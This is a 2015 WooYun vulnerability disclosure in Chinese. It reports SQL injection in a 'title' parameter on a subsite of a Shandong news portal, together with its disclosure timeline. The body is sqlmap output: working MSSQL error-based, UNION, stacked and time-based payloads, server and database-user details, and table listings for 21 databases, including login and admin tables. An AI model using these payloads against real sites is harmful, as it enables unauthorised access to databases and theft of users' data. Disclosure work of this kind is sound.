当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158958

漏洞标题:中国山东网某一分站某处存在sql注入(可dump21个库/用户信息/大量记录信息泄漏)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-12-08 11:30

修复时间:2016-01-23 15:16

公开时间:2016-01-23 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-11: 厂商已经确认,细节仅向厂商公开
2015-12-21: 细节向核心白帽子及相关领域专家公开
2015-12-31: 细节向普通白帽子公开
2016-01-10: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

一个分站,21个数据库均可dump,大量的记录信息可泄漏,多个子站用户信息密码也可被泄漏。

详细说明:

中国山东网(**.**.**.**)是经国务院新闻办公室批准成立的全国重点新闻网站,由山东省人民政府新闻办公室主管、走向世界
杂志社主办,新之航传媒集团山东网新传媒有限公司总策划运营,于1996年正式开通。
注入点:

http://**.**.**.**/comp/110/?title=1


title存在注入

1.jpg


GET parameter 'title' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] N
sqlmap identified the following injection points with a total of 59 HTTP(s) requ
ests:
---
Place: GET
Parameter: title
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: title=1%' AND 9852=CONVERT(INT,(SELECT CHAR(113)+CHAR(104)+CHAR(112
)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (9852=9852) THEN CHAR(49) ELSE CHAR(48)
 END))+CHAR(113)+CHAR(116)+CHAR(102)+CHAR(103)+CHAR(113))) AND '%'='
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: title=1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
CHAR(113)+CHAR(104)+CHAR(112)+CHAR(105)+CHAR(113)+CHAR(119)+CHAR(90)+CHAR(70)+CH
AR(81)+CHAR(71)+CHAR(101)+CHAR(103)+CHAR(106)+CHAR(102)+CHAR(84)+CHAR(113)+CHAR(
116)+CHAR(102)+CHAR(103)+CHAR(113),NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: title=1%'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: title=1%' WAITFOR DELAY '0:0:5'--
---
[00:52:22] [INFO] testing Microsoft SQL Server
[00:52:22] [INFO] confirming Microsoft SQL Server
[00:52:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[00:52:23] [INFO] fetching current user
current user:    'idollar'
[00:52:24] [INFO] fetching current database
current database:    'SDSW20_Other'
[00:52:24] [INFO] testing if current user is DBA
current user is DBA:    False
database management system users [2]:
[*] idollar
[*] sa
available databases [21]:
[*] 91haofang
[*] adv_new
[*] bbs
[*] cms_newair
[*] jiaju
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SD_QIYE
[*] SDSW20_Ads
[*] SDSW20_Ask
[*] SDSW20_Digg
[*] SDSW20_HR
[*] SDSW20_Main
[*] SDSW20_Other
[*] SDSW20_Rank
[*] SDSW20_Video_old
[*] tempdb
[*] yycar
Database: SDSW20_Ads
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.IPToCity                                     | 319356  |
| dbo.cli_adv                                      | 37      |
| dbo.loca                                         | 22      |
| dbo.cli_num                                      | 11      |
| dbo.ad_m                                         | 2       |
| dbo.ad_m                                         | 2       |
| dbo.adv_m                                        | 2       |
| dbo.adv_m                                        | 2       |
| dbo.c_adv                                        | 2       |
+--------------------------------------------------+---------+
Database: SDSW20_Digg
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.DG_DiggInfo1                                 | 847     |
| dbo.DG_DiggInfo1                                 | 847     |
| dbo.DG_DiggRemark                                | 260     |
| dbo.DG_DiggRemarks                               | 67      |
| dbo.dg_CollectSet                                | 41      |
| dbo.TC_DiggCatogry                               | 18      |
+--------------------------------------------------+---------+
Database: jiaju
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.operationlog                                 | 1018    |
| dbo.imagelibrary                                 | 578     |
| **.**.**.**pany                                      | 126     |
| dbo.specail                                      | 51      |
| dbo.designer                                     | 47      |
| dbo.sampleroom                                   | 45      |
| dbo.news_class                                   | 25      |
| dbo.news_class                                   | 25      |
| dbo.area                                         | 17      |
| dbo.category                                     | 16      |
| dbo.administrator                                | 14      |
| dbo.friendlink                                   | 7       |
| dbo.usertype                                     | 2       |
+--------------------------------------------------+---------+
Database: SDSW20_Other
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.UserClicks                                   | 16283   |
| dbo.TC_Area                                      | 3526    |
| dbo.TE_TourImages                                | 3419    |
| dbo.te_PlaceToAgent                              | 2406    |
| dbo.TE_PlaceRemark                               | 1618    |
| dbo.TE_LeisureImages                             | 1540    |
| dbo.TE_MallImages                                | 1148    |
| dbo.TE_TourLineItem                              | 821     |
| dbo.TE_TourPlace                                 | 816     |
| dbo.TE_FoodImages                                | 768     |
| dbo.TE_FoodImages                                | 768     |
| dbo.TE_MallPlace                                 | 496     |
| dbo.TE_FinanceImages                             | 423     |
| dbo.TE_HouseImages                               | 372     |
| dbo.TE_LeisurePlace                              | 365     |
| dbo.TE_HealthImages                              | 338     |
| dbo.TE_EntImages                                 | 311     |
| dbo.TE_HealthPlace                               | 311     |
| dbo.TE_FinancePlace                              | 304     |
| dbo.TE_FoodPlace                                 | 284     |
| dbo.TB_Bulletin                                  | 275     |
| dbo.TE_EntPlace                                  | 257     |
| dbo.TE_AutoImages                                | 249     |
| dbo.TE_HousePlace                                | 227     |
| dbo.TE_EduImages                                 | 202     |
| dbo.TE_TourBooking                               | 176     |
| dbo.TB_AdBak2009319                              | 172     |
| dbo.TB_AdBak2009319                              | 172     |
| dbo.TE_SportsImages                              | 161     |
| dbo.TE_GolfImages                                | 153     |
| dbo.TE_AutoPlace                                 | 152     |
| dbo.TE_Finance_ManageMoney                       | 127     |
| dbo.TE_EduPlace                                  | 122     |
| dbo.TC_PlaceCatogry1                             | 88      |
| dbo.TC_PlaceCatogry1                             | 88      |
| dbo.TB_PKDetails                                 | 85      |
| dbo.TB_PKDetails                                 | 85      |
| dbo.TE_GolfPlace                                 | 83      |
| dbo.member                                       | 60      |
| dbo.TE_CourseApply                               | 59      |
| dbo.TE_Course2                                   | 55      |
| dbo.TE_Course2                                   | 55      |
| dbo.TE_SportsPlace                               | 49      |
| dbo.TC_ProductCatogry                            | 42      |
| dbo.TE_EduConsult                                | 33      |
| dbo.TE_Product                                   | 33      |
| dbo.TB_Remark                                    | 28      |
| dbo.Banks                                        | 18      |
| dbo.TB_VotePosition                              | 16      |
| dbo.TB_VotePosition                              | 16      |
| dbo.TC_PlaceDegree                               | 15      |
| dbo.TE_CourseCategory                            | 13      |
| dbo.CurrencysTable                               | 12      |
| dbo.TC_BulletinPosition                          | 12      |
| dbo.TC_LeadBuyCategory                           | 11      |
| dbo.ManageMoneyTable                             | 9       |
| dbo.TB_PKPosition                                | 9       |
| dbo.TZ_category                                  | 7       |
| dbo.CardGrades                                   | 6       |
| dbo.TE_Attractions                               | 6       |
| dbo.CardTypes                                    | 5       |
| dbo.TB_Leave                                     | 5       |
| dbo.tb_test                                      | 5       |
| dbo.TF_SSInfo                                    | 4       |
| dbo.TE_CateMerchant                              | 3       |
| dbo.CardClass                                    | 2       |
| dbo.TB_leadBuyRemark                             | 2       |
| dbo.TB_LeadBuy                                   | 1       |
| dbo.TE_EduUser                                   | 1       |
| dbo.TE_Finance_Cards                             | 1       |
| dbo.TE_Hotel                                     | 1       |
| dbo.TE_Route                                     | 1       |
| dbo.TL_UserGroup                                 | 1       |
| dbo.TL_UserGroup                                 | 1       |
| dbo.TZ_rele                                      | 1       |
+--------------------------------------------------+---------+
Database: cms_newair
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.sd_stat_Info                                 | 337050  |
| dbo.sd_sys_logs                                  | 4541    |
| dbo.sd_Order                                     | 1029    |
| dbo.sd_Sys_Help                                  | 656     |
| dbo.sd_news_Class                                | 176     |
| dbo.sd_news_Class                                | 176     |
| dbo.sd_hr                                        | 37      |
| dbo.sd_api_navi                                  | 32      |
| dbo.sd_api_qmenu                                 | 20      |
| dbo.sd_sys_LabelStyle                            | 20      |
| dbo.sd_baoming                                   | 17      |
| dbo.sd_News_URL                                  | 15      |
| dbo.sd_user_Message                              | 12      |
| dbo.sd_user_MessFiles                            | 12      |
| dbo.sd_sys_admingroup                            | 11      |
| dbo.sd_sys_admingroup                            | 11      |
| dbo.sd_sys_userfields                            | 11      |
| dbo.sd_sys_userfields                            | 11      |
| dbo.sd_user_Ghistory                             | 11      |
| dbo.sd_2016taili                                 | 10      |
| dbo.sd_sys_UserLevel                             | 10      |
| dbo.sd_sys_LabelFree                             | 6       |
| dbo.sd_sys_LabelClass                            | 4       |
| dbo.sd_sys_LabelClass                            | 4       |
| dbo.sd_stat_content                              | 3       |
| dbo.sd_news_topline                              | 2       |
| dbo.sd_sys_styleclass                            | 2       |
| dbo.sd_ads_class                                 | 1       |
| dbo.sd_ads_class                                 | 1       |
| dbo.sd_Collect_SiteFolder                        | 1       |
| dbo.sd_Collect_SiteFolder                        | 1       |
| dbo.sd_friend_pram                               | 1       |
| dbo.sd_news_site                                 | 1       |
| dbo.sd_stat_class                                | 1       |
| dbo.sd_stat_param                                | 1       |
| dbo.sd_sys_newsIndex                             | 1       |
| dbo.sd_sys_param                                 | 1       |
| dbo.sd_sys_parmConstr                            | 1       |
| dbo.sd_sys_parmPrint                             | 1       |
| dbo.sd_sys_Pramother                             | 1       |
| dbo.sd_sys_PramUser                              | 1       |
| dbo.sd_user_Group                                | 1       |
| dbo.sd_user_Guser                                | 1       |
+--------------------------------------------------+---------+
Database: SDSW20_HR
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.JobTree                                      | 850     |
| dbo.FromTree                                     | 405     |
| dbo.qygoldmanage                                 | 364     |
| dbo.invite_info                                  | 134     |
| dbo.Person_Login                                 | 108     |
| dbo.Company_Login                                | 103     |
| dbo.Company_Basemeans                            | 83      |
| dbo.Article_Content                              | 58      |
| dbo.Person_Basemeans                             | 37      |
| dbo.WillJob                                      | 32      |
| dbo.TradeTree                                    | 22      |
| dbo.FriendSite                                   | 16      |
| dbo.Fast_AD                                      | 12      |
| dbo.Article_Class                                | 9       |
| dbo.language                                     | 7       |
| dbo.School_Login                                 | 7       |
| dbo.Person_YPmanage                              | 5       |
| dbo.Team                                         | 5       |
| dbo.Advertisement                                | 4       |
| dbo.Index_ADFlash                                | 4       |
| dbo.Admin_Login                                  | 3       |
| dbo.AdZone                                       | 3       |
| dbo.School_Student                               | 3       |
| dbo.Article_Position                             | 2       |
| dbo.Hunter_Manage                                | 2       |
| dbo.Page_Basemeans                               | 2       |
| dbo.School_Basemeans                             | 2       |
| dbo.School_Message                               | 2       |
| dbo.Collection                                   | 1       |
| dbo.marqueeFont                                  | 1       |
| dbo.PageAbout                                    | 1       |
| dbo.pgzp                                         | 1       |
| dbo.Vote                                         | 1       |
+--------------------------------------------------+---------+
Database: SDSW20_Ask
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.AK_QuestionAskedUser                         | 3159    |
| dbo.AK_QuestionAskedUser                         | 3159    |
| dbo.vk_question                                  | 2741    |
| dbo.AK_Answer                                    | 1414    |
| dbo.TC_AskCatogry                                | 176     |
| dbo.AK_AnswerRemark                              | 44      |
| dbo.AK_AdditionalQuestion                        | 21      |
+--------------------------------------------------+---------+
Database: SDSW20_Rank
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.RK_RankItems                                 | 3053    |
| dbo.RK_RankInfo                                  | 332     |
| dbo.RK_RankRemark                                | 286     |
| dbo.TC_RankType1                                 | 20      |
| dbo.TC_RankType1                                 | 20      |
| dbo.tb_tempRank                                  | 18      |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile                                   | 3302    |
| dbo.backupset                                    | 1606    |
| dbo.backupmediafamily                            | 1602    |
| dbo.backupmediaset                               | 1602    |
| dbo.syspolicy_configuration                      | 4       |
+--------------------------------------------------+---------+
Database: yycar
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.auto_car_comments                            | 30718   |
| dbo.gData_News                                   | 14303   |
| dbo.sj_baoming                                   | 4143    |
| dbo.auto_car_air                                 | 2851    |
| dbo.auto_car_air                                 | 2851    |
| dbo.auto_car_body                                | 2851    |
| dbo.auto_car_engine                              | 2851    |
| dbo.auto_car_light                               | 2851    |
| dbo.auto_car_media                               | 2851    |
| dbo.auto_car_mirror                              | 2851    |
| dbo.auto_car_new                                 | 2851    |
| dbo.auto_car_on                                  | 2851    |
| dbo.auto_car_operate                             | 2851    |
| dbo.auto_car_out                                 | 2851    |
| dbo.auto_car_power                               | 2851    |
| dbo.auto_car_safe                                | 2851    |
| dbo.auto_car_site                                | 2851    |
| dbo.tg_baoming                                   | 2827    |
| dbo.oprate_log                                   | 2595    |
| dbo.auto_appraise                                | 871     |
| dbo.auto_user_news                               | 789     |
| dbo.auto_car_brand                               | 653     |
| dbo.auto_car_price                               | 245     |
| dbo.auto_tukuImage                               | 172     |
| dbo.auto_user_msg                                | 163     |
| dbo.auto_specail                                 | 96      |
| dbo.auto_news_class                              | 66      |
| dbo.auto_news_class                              | 66      |
| dbo.sys_puruser                                  | 39      |
| dbo.auto_ad_class                                | 34      |
| dbo.auto_ad_class                                | 34      |
| dbo.auto_user_action                             | 31      |
| dbo.auto_user_action                             | 31      |
| dbo.auto_position                                | 26      |
| dbo.sys_item                                     | 26      |
| dbo.auto_user_schoolbaom                         | 24      |
| dbo.auto_yangche                                 | 22      |
| dbo.auto_area                                    | 18      |
| dbo.auto_user_feel                               | 18      |
| dbo.gData_Setting                                | 17      |
| dbo.auto_user_order                              | 16      |
| dbo.auto_friendlink                              | 14      |
| dbo.auto_user_schoolprice                        | 13      |
| dbo.auto_class                                   | 12      |
| dbo.auto_tg_car                                  | 12      |
| dbo.auto_tg_car                                  | 12      |
| dbo.auto_user_type                               | 12      |
| dbo.auto_car_grade                               | 10      |
| dbo.auto_user_bx                                 | 10      |
| dbo.auto_source                                  | 9       |
| dbo.sys_config                                   | 9       |
| dbo.auto_user_remark                             | 7       |
| dbo.phpcms_model_field                           | 7       |
| dbo.auto_tukuCategory                            | 6       |
| dbo.auto_areatemp                                | 5       |
| dbo.auto_user_pay                                | 5       |
| dbo.auto_tg_xuechebm                             | 4       |
| dbo.auto_tg_xuechebm                             | 4       |
| dbo.sys_purgroup                                 | 4       |
| dbo.auto_user_guwen                              | 3       |
| dbo.auto_2car_buy                                | 2       |
| dbo.auto_2car_buy                                | 2       |
| dbo.auto_author                                  | 2       |
| dbo.auto_keys                                    | 1       |
| dbo.auto_tgbm                                    | 1       |
| dbo.sys_module                                   | 1       |
+--------------------------------------------------+---------+
Database: adv_new
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.c_adv_all                                    | 988744  |
| dbo.c_adv_all                                    | 988744  |
| dbo.IPToCity                                     | 319356  |
| dbo.adv                                          | 188     |
| dbo.ad                                           | 178     |
| dbo.c_ad_all                                     | 74      |
| dbo.c_ad_all                                     | 74      |
| dbo.loca                                         | 55      |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| sys.messages                                     | 98318   |
| sys.sysmessages                                  | 98318   |
| sys.fulltext_system_stopwords                    | 15829   |
| sys.syscolumns                                   | 11966   |
| sys.all_parameters                               | 7090    |
| sys.system_parameters                            | 7090    |
| sys.trace_subclass_values                        | 5366    |
| sys.all_columns                                  | 4670    |
| sys.system_columns                               | 4626    |
| sys.trace_event_bindings                         | 4304    |
| sys.syscomments                                  | 2994    |
| dbo.spt_values                                   | 2508    |
| sys.all_objects                                  | 1934    |
| sys.sysobjects                                   | 1934    |
| sys.system_objects                               | 1928    |
| sys.database_permissions                         | 1844    |
| sys.syspermissions                               | 1844    |
| sys.sysprotects                                  | 1843    |
| sys.all_sql_modules                              | 1783    |
| sys.system_sql_modules                           | 1783    |
| sys.dm_audit_actions                             | 454     |
| sys.spatial_reference_systems                    | 390     |
| sys.event_notification_event_types               | 365     |
| sys.all_views                                    | 354     |
| sys.system_views                                 | 354     |
| sys.trigger_event_types                          | 245     |
| sys.trace_events                                 | 180     |
| sys.allocation_units                             | 128     |
| sys.partitions                                   | 116     |
| sys.syscharsets                                  | 114     |
| sys.xml_schema_facets                            | 112     |
| sys.xml_schema_components                        | 99      |
| sys.system_components_surface_area_configuration | 95      |
| sys.dm_audit_class_type_map                      | 83      |
| sys.xml_schema_types                             | 82      |
| sys.configurations                               | 70      |
| sys.sysconfigures                                | 70      |
| sys.syscurconfigs                                | 70      |
| sys.trace_columns                                | 66      |
| sys.fulltext_document_types                      | 50      |
| sys.fulltext_languages                           | 48      |
| INFORMATION_SCHEMA.COLUMNS                       | 44      |
| sys.columns                                      | 44      |
| sys.systypes                                     | 34      |
| sys.types                                        | 34      |
| sys.syslanguages                                 | 33      |
| sys.database_recovery_status                     | 22      |
| sys.databases                                    | 22      |
| sys.securable_classes                            | 22      |
| sys.sysdatabases                                 | 22      |
| sys.trace_categories                             | 21      |
| sys.xml_schema_component_placements              | 18      |
| INFORMATION_SCHEMA.SCHEMATA                      | 15      |
| sys.schemas                                      | 15      |
| sys.xml_schema_attributes                        | 15      |
| sys.database_principals                          | 14      |
| sys.sysusers                                     | 14      |
| sys.server_principals                            | 11      |
| sys.service_contract_message_usages              | 11      |
| sys.server_permissions                           | 7       |
| sys.sysindexes                                   | 7       |
| sys.indexes                                      | 6       |
| sys.objects                                      | 6       |
| sys.stats_columns                                | 6       |
| sys.stats_columns                                | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES              | 5       |
| INFORMATION_SCHEMA.TABLES                        | 5       |
| sys.index_columns                                | 5       |
| sys.sysindexkeys                                 | 5       |
| sys.tables                                       | 5       |
| sys.endpoints                                    | 4       |
| sys.assembly_types                               | 3       |
| sys.service_queue_usages                         | 3       |
| sys.type_assembly_usages                         | 3       |
| sys.xml_schema_namespaces                        | 3       |
| sys.database_files                               | 2       |
| sys.login_token                                  | 2       |
| sys.service_contract_usages                      | 2       |
| sys.sql_logins                                   | 2       |
| sys.sysfiles                                     | 2       |
| sys.syslogins                                    | 2       |
| sys.user_token                                   | 2       |
| dbo.spt_monitor                                  | 1       |
| sys.assemblies                                   | 1       |
| sys.assembly_files                               | 1       |
| sys.data_spaces                                  | 1       |
| sys.database_role_members                        | 1       |
| sys.default_constraints                          | 1       |
| sys.dm_exec_requests                             | 1       |
| sys.dm_exec_sessions                             | 1       |
| sys.filegroups                                   | 1       |
| sys.server_role_members                          | 1       |
| sys.servers                                      | 1       |
| sys.sysconstraints                               | 1       |
| sys.sysfilegroups                                | 1       |
| sys.sysmembers                                   | 1       |
| sys.sysprocesses                                 | 1       |
| sys.sysservers                                   | 1       |
| sys.tcp_endpoints                                | 1       |
| sys.via_endpoints                                | 1       |
| sys.xml_schema_collections                       | 1       |
| sys.xml_schema_model_groups                      | 1       |
| sys.xml_schema_wildcards                         | 1       |
+--------------------------------------------------+---------+
Database: SDSW20_Main
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.ph_Votes                                     | 758851  |
| dbo.TB_SysLog                                    | 565498  |
| dbo.flc_Votes                                    | 415452  |
| dbo.lt_CJResult                                  | 280828  |
| dbo.stu_Votes                                    | 264922  |
| dbo.SH_PersonVote                                | 151246  |
| dbo.ts_Votes                                     | 134817  |
| dbo.ph_Production                                | 112554  |
| dbo.vw_TU_User                                   | 81115   |
| dbo.yl_Votes                                     | 40133   |
| dbo.hs_Photos                                    | 17221   |
| dbo.ph_Comment                                   | 14573   |
| dbo.VT_DT_VoteIP                                 | 13706   |
| dbo.lt_temp                                      | 12840   |
| dbo.AdminUserRoles                               | 10479   |
| dbo.ph_ImageGroup                                | 9957    |
| dbo.hssd_Photos                                  | 9713    |
| dbo.sdair_VoteIP                                 | 8169    |
| dbo.sdair_VoteIP                                 | 8169    |
| dbo.dz_Votes                                     | 7351    |
| dbo.ta_ZhiBoItem                                 | 7083    |
| dbo.ta_ZhiBoItem                                 | 7083    |
| dbo.flc_Photos                                   | 6574    |
| dbo.wf_kx_AnswerPerson                           | 6206    |
| dbo.ta_BaoMing                                   | 4836    |
| dbo.shds_Photos                                  | 4770    |
| dbo.TU_User_Append                               | 3920    |
| dbo.TU_User_Append                               | 3920    |
| dbo.SH_PersonImage                               | 3904    |
| dbo.my_ShareRecord                               | 3789    |
| dbo.TC_Area                                      | 3525    |
| dbo.TS_DaRen                                     | 3168    |
| dbo.dl_Text                                      | 3047    |
| dbo.Common_Votes                                 | 2949    |
| dbo.TE_Agent                                     | 2506    |
| dbo.TS_DaRenUserInfo                             | 2445    |
| dbo.zgm_ShuXin                                   | 2226    |
| dbo.zgm_SunDream                                 | 2022    |
| dbo.ph_ProModiList                               | 1952    |
| dbo.stu_Photos                                   | 1753    |
| dbo.flc_ImageGroup                               | 1688    |
| dbo.shuhua_Photos                                | 1374    |
| dbo.shds_UserInfo                                | 1309    |
| dbo.TS_Production                                | 1254    |
| dbo.qx_ShareRecord                               | 1152    |
| dbo.dl_Photos                                    | 1050    |
| dbo.lh_RegisterLawyer                            | 1019    |
| dbo.my_SerialNumber                              | 1000    |
| dbo.zgm_AnswerPerson                             | 980     |
| dbo.dl_UserInfo                                  | 929     |
| dbo.btl_Votes                                    | 861     |
| dbo.zgm_ShaiXiaoKang                             | 803     |
| dbo.VT_DT_VoteItems                              | 769     |
| dbo.tb_SiteToFriendLink                          | 763     |
| dbo.dl_2015_Photos                               | 717     |
| dbo.yl_Photos                                    | 714     |
| dbo.sdchina_AnswerPerson                         | 684     |
| dbo.flc_UserInfo                                 | 622     |
| dbo.ZhengWen                                     | 597     |
| dbo.ph_HDBaoMing                                 | 565     |
| dbo.zgm_User                                     | 507     |
| dbo.btl_Photos                                   | 503     |
| dbo.zgm_CallDreamPingLun                         | 441     |
| dbo.zgm_CallDreamPingLun                         | 441     |
| dbo.dl_2015_UserInfo                             | 424     |
| dbo.TB_FunCodes                                  | 420     |
| dbo.TB_Columns                                   | 385     |
| dbo.stu_UserInfo                                 | 377     |
| dbo.qx_yh                                        | 351     |
| dbo.yl_Users                                     | 303     |
| dbo.wf_kx_Question                               | 302     |
| dbo.aspnet_UsersInRoles                          | 301     |
| dbo.aspnet_UsersInRoles                          | 301     |
| dbo.vw_aspnet_UsersInRoles                       | 301     |
| dbo.vw_aspnet_UsersInRoles                       | 301     |
| dbo.ph_Reserve                                   | 257     |
| dbo.ph_Funding                                   | 253     |
| dbo.AdminUserWork                                | 252     |
| dbo.SH_WebChat                                   | 243     |
| dbo.TC_SysFunctions                              | 240     |
| dbo.qilu_story                                   | 227     |
| dbo.VT_MT_Vote                                   | 221     |
| dbo.story_Stories                                | 211     |
| dbo.my_User                                      | 207     |
| dbo.TU_AdminBBS                                  | 205     |
| dbo.TU_AdminBBS                                  | 205     |
| dbo.dz_rqPlayer                                  | 195     |
| dbo.lf_Photo                                     | 189     |
| dbo.qx_User                                      | 179     |
| dbo.tb_PublishTo                                 | 178     |
| dbo.Dx_UserMaJia                                 | 176     |
| dbo.Dx_UserMaJia                                 | 176     |
| dbo.JJFZ_TouGao                                  | 174     |
| dbo.flc_Award                                    | 154     |
| dbo.aspnet_Membership                            | 149     |
| dbo.vw_aspnet_MembershipUsers                    | 149     |
| dbo.ph_HDZhaomuJune                              | 139     |
| dbo.qzlx_AnswerPerson                            | 130     |
| dbo.ph_UserInfoAppend                            | 121     |
| dbo.ph_UserInfoAppend                            | 121     |
| dbo.ph_SignUpHuace                               | 118     |
| dbo.ph_SignUpHuace                               | 118     |
| dbo.lcph_Photos                                  | 115     |
| dbo.lf_UserInfo                                  | 106     |
| dbo.qx_BaoMing                                   | 99      |
| dbo.zgm_CallImg                                  | 98      |
| dbo.shds_YuYue                                   | 91      |
| dbo.TS_UserInfo                                  | 91      |
| dbo.zgm_Question                                 | 89      |
| dbo.jh_Article                                   | 85      |
| dbo.ph_HDZhaomuSep                               | 82      |
| dbo.zgm_OldNewImage                              | 81      |
| dbo.TB_ShortCut                                  | 80      |
| dbo.jh_UserInfo                                  | 78      |
| dbo.lz_UserInfo                                  | 73      |
| dbo.zgm_School                                   | 73      |
| dbo.SH_PersonAppend                              | 70      |
| dbo.SH_PersonAppend                              | 70      |
| dbo.NanShan_Apply                                | 66      |
| dbo.tab_webchat_newair                           | 66      |
| dbo.tab_webchat_newair                           | 66      |
| dbo.lz_Photo                                     | 65      |
| dbo.jnsh_Photos                                  | 63      |
| dbo.dl_2015_Award                                | 62      |
| dbo.TC_ColumnType                                | 61      |
| dbo.lcph_ImageGroup                              | 60      |
| dbo.TB_Sites                                     | 52      |
| dbo.qzlx_Question                                | 51      |
| dbo.ent_FilmUser                                 | 50      |
| dbo.ph_Sheyingshi                                | 50      |
| dbo.VoteUsers                                    | 50      |
| dbo.MT_PhotoSpecial                              | 49      |
| dbo.MT_PhotoSpecial                              | 49      |
| dbo.P_V                                          | 43      |
| dbo.ph_GrapherWork                               | 42      |
| dbo.zgm_ZmCompany                                | 41      |
| dbo.njly_Images                                  | 40      |
| dbo.zgm_RecommendZmr                             | 40      |
| dbo.FC_loushiliren                               | 38      |
| dbo.cj2014_Pic                                   | 36      |
| dbo.njly_Baoming                                 | 36      |
| dbo.sdair_Company                                | 32      |
| dbo.lcph_UserInfo                                | 30      |
| dbo.qilu_jiagui                                  | 28      |
| dbo.jnsx_ShuXin                                  | 27      |
| dbo.aspnet_Roles                                 | 26      |
| dbo.hx_BaoMing                                   | 26      |
| dbo.TB_SWRoles                                   | 26      |
| dbo.TC_Nodes                                     | 26      |
| dbo.TC_SysModules                                | 26      |
| dbo.vw_aspnet_Roles                              | 26      |
| dbo.zgm_ZmPerson                                 | 26      |
| dbo.la_BaoMing                                   | 25      |
| dbo.ta_WebZhiBoItem                              | 25      |
| dbo.ta_WebZhiBoItem                              | 25      |
| dbo.fz_jining_ChunwanBaoming                     | 24      |
| dbo.TC_BulletinPosition                          | 24      |
| dbo.cj2014_Question                              | 20      |
| dbo.ph_Grapher                                   | 19      |
| dbo.tb_FriendLinkGroup                           | 17      |
| dbo.tb_FriendLinkGroup                           | 17      |
| dbo.[!FS_NewsClass]                              | 16      |
| dbo.[!FS_NewsClass]                              | 16      |
| dbo.cj2014_AnswerPerson                          | 16      |
| dbo.ph_Activity                                  | 16      |
| dbo.TB_FaceImg                                   | 16      |
| dbo.VoteItem                                     | 16      |
| dbo.dl_Votes                                     | 14      |
| dbo.jnsh_UserInfo                                | 13      |
| dbo.lcph_Votes                                   | 13      |
| dbo.NewAirVote                                   | 13      |
| dbo.ST_PhotoTag                                  | 13      |
| dbo.aq_loveStory                                 | 10      |
| dbo.hs_Votes                                     | 10      |
| dbo.TB_Config                                    | 9       |
| dbo.TB_FriendLinkToGroup                         | 9       |
| dbo.TC_UserEducation                             | 9       |
| dbo.TB_Tables                                    | 8       |
| dbo.f_Activist                                   | 7       |
| dbo.TB_SiteToGroup                               | 7       |
| dbo.TC_DegreeGroup                               | 7       |
| dbo.TC_DegreeGroup                               | 7       |
| dbo.TC_UserDegree                                | 7       |
| dbo.aspnet_SchemaVersions                        | 6       |
| dbo.dz_baoming                                   | 6       |
| dbo.hs_Category                                  | 6       |
| dbo.ph_AwardItem                                 | 6       |
| dbo.ph_AwardItem                                 | 6       |
| dbo.ph_Sybaoming                                 | 6       |
| dbo.hssd_Category                                | 5       |
| dbo.TC_UserRelation                              | 5       |
| dbo.TC_UserStatus                                | 5       |
| dbo.lt_AwardLevel                                | 4       |
| dbo.lt_AwardLevel                                | 4       |
| dbo.TB_SWRolesSpecialColumn                      | 4       |
| dbo.TU_Expert                                    | 4       |
| dbo.ph_Catogry                                   | 3       |
| dbo.TB_Channels                                  | 3       |
| dbo.TB_WorkLog_backup                            | 3       |
| dbo.TB_WorkLog_backup                            | 3       |
| dbo.MT_Application                               | 2       |
| dbo.tb_SitesToExpertsCatogry                     | 2       |
| dbo.TU_UserSpace                                 | 2       |
| dbo.zgm_FromSort                                 | 2       |
| dbo.aspnet_Applications                          | 1       |
| dbo.ent_FilmAction                               | 1       |
| dbo.haier_baoming                                | 1       |
| dbo.MT_PhotoTag                                  | 1       |
| dbo.sdchina_QuestionsCategory                    | 1       |
| dbo.sdchina_QuestionsCategory                    | 1       |
| dbo.TC_AccessChar                                | 1       |
| dbo.TC_AgentType                                 | 1       |
| dbo.ts_DaRenVotes                                | 1       |
| dbo.TU_UserAsk                                   | 1       |
| dbo.TU_UserBBS                                   | 1       |
| dbo.TU_UserDigg                                  | 1       |
| dbo.TU_Volunteer                                 | 1       |
